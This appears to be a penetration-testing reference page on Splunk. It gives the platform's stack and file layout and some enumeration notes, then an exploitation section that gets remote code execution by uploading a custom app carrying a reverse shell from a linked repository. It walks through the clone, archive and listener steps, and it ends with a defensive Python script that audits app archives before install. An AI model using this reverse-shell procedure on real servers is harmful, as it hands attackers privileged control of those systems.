Splunk
Splunk is a powerful log management, security information and event management (SIEM), and data analytics platform used for searching, monitoring, and analyzing machine-generated data. It is widely used for IT operations, security, and business analytics.
Tech Stack of Splunk
- Backend: C++, Python
- Frontend: HTML, CSS, JavaScript (Uses Django and SimpleXML for dashboards)
- Database: Proprietary indexing-based storage (not a traditional RDBMS)
- Server: Runs on Linux, Windows, macOS (uses its own web server but can integrate with Nginx, Apache)
File Structure
/splunk-root
├── bin/                    # Executable scripts for starting/stopping Splunk
│   ├── splunk              # Main Splunk CLI command (Linux/macOS)
│   ├── splunk.exe          # Windows equivalent of the Splunk CLI
│   └── splunkd             # Splunk daemon process
├── etc/                    # Configuration and settings files
│   ├── system/             # Default system-wide configurations
│   ├── apps/               # Installed Splunk apps (custom and third-party)
│   ├── users/              # User-specific settings and preferences
│   ├── auth/               # Authentication and user role settings
│   └── splunk-launch.conf  # Startup configuration
├── var/                    # Runtime data and logs
│   ├── log/                # Log files for Splunk operations (splunkd.log, web_service.log)
│   ├── run/                # PID files and runtime process information
│   ├── lib/                # Cached data and extracted files
│   ├── spool/              # Incoming data before indexing
│   └── stats/              # Statistics and monitoring data
├── share/                  # Shared files (help docs, libraries, etc.)
├── lib/                    # Splunk libraries and dependencies
├── include/                # Header files and API definitions
├── deployment-apps/        # Apps deployed via the Splunk deployment server
├── scripts/                # Custom scripts for automation
├── splunk.pid              # Process ID file for the Splunk instance
├── splunkd.log             # Main log file for the Splunk daemon
├── LICENSE                 # Splunk license file
└── README.txt              # Basic information about Splunk
Enumeration
- Splunk is commonly hosted on Windows or Linux servers and typically runs as the SYSTEM/root account.
- Splunk is rarely found exposed on a company's external network.
- If a Splunk installation is left unmaintained, it automatically converts to the free version, which does not require authentication.
- Nmap can identify the 'Splunkd httpd' service and the Splunk management port used for communication with the Splunk REST API.
Exploitation
RCE with Custom Application
We can create a custom application in Splunk that can run Python, Batch, Bash, or PowerShell scripts. In the case of Splunk running on Linux, we can use a Bash reverse shell script, or PowerShell if the target is a Windows server. However, we can also use Python (which comes pre-installed with Splunk) to ensure compatibility on both Linux and Windows servers.
Link: https://github.com/0xjpuff/reverse_shell_splunk
git clone https://github.com/0xjpuff/reverse_shell_splunk && cd reverse_shell_splunk/reverse_shell_splunk
# Edit the script we intend to use (e.g. the .ps1 or the Python script) to point at our listener
# Once edited, go back up one level so the app directory can be archived by name
cd ..
tar -cvzf ourfile.tar.gz reverse_shell_splunk
# Start Netcat or msfconsole's 'multi/handler' on the port we specified, then
# go to Splunk and use 'Install app from file' to upload the tarball.
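Because an uploaded app's bin/ scripts and the scripted inputs declared in its inputs.conf run under the splunkd account as soon as the app is enabled, the check a defender wants is to inspect the archive before anyone installs it. The following is an added example, not code from this page or from the linked repository; the function names and the sample app it builds in memory are constructed for illustration:

```python
import io
import re
import tarfile

SCRIPT_EXT = (".py", ".sh", ".bat", ".cmd", ".ps1")
# Splunk schedules scripted inputs declared as [script://<command>] in inputs.conf
STANZA_RE = re.compile(r"^\[script://(.+?)\]\s*$")

def _add(tar, name, data):
    info = tarfile.TarInfo(name)
    info.size = len(data)
    tar.addfile(info, io.BytesIO(data))

def build_sample_app() -> bytes:
    """Constructed sample app: one scripted input pointing at a bin/ script."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        _add(tar, "demo_app/default/inputs.conf",
             b"[script://./bin/collect.py]\ndisabled = 0\ninterval = 10\n")
        _add(tar, "demo_app/bin/collect.py", b"print('hello')\n")
        _add(tar, "demo_app/README", b"demo\n")
    return buf.getvalue()

def audit_splunk_app(tar_bytes: bytes) -> dict:
    """Report what would execute if this app archive were installed and enabled."""
    findings = {"scripts": [], "scripted_inputs": [], "suspicious_paths": []}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            name = member.name
            parts = name.split("/")
            # Absolute or traversing paths would land outside etc/apps/<app>/
            if name.startswith("/") or ".." in parts:
                findings["suspicious_paths"].append(name)
                continue
            if not member.isfile():
                continue
            # Anything under <app>/bin/ with a script extension is executable code
            if len(parts) >= 3 and parts[1] == "bin" and name.lower().endswith(SCRIPT_EXT):
                findings["scripts"].append(name)
            # inputs.conf is where scripted inputs are scheduled to run
            if parts[-1] == "inputs.conf":
                text = tar.extractfile(member).read().decode("utf-8", "replace")
                for line in text.splitlines():
                    m = STANZA_RE.match(line.strip())
                    if m:
                        findings["scripted_inputs"].append(m.group(1))
    return findings
```

Any non-empty "scripts" or "scripted_inputs" list should be reviewed by hand before the app is approved, and "suspicious_paths" should block installation outright.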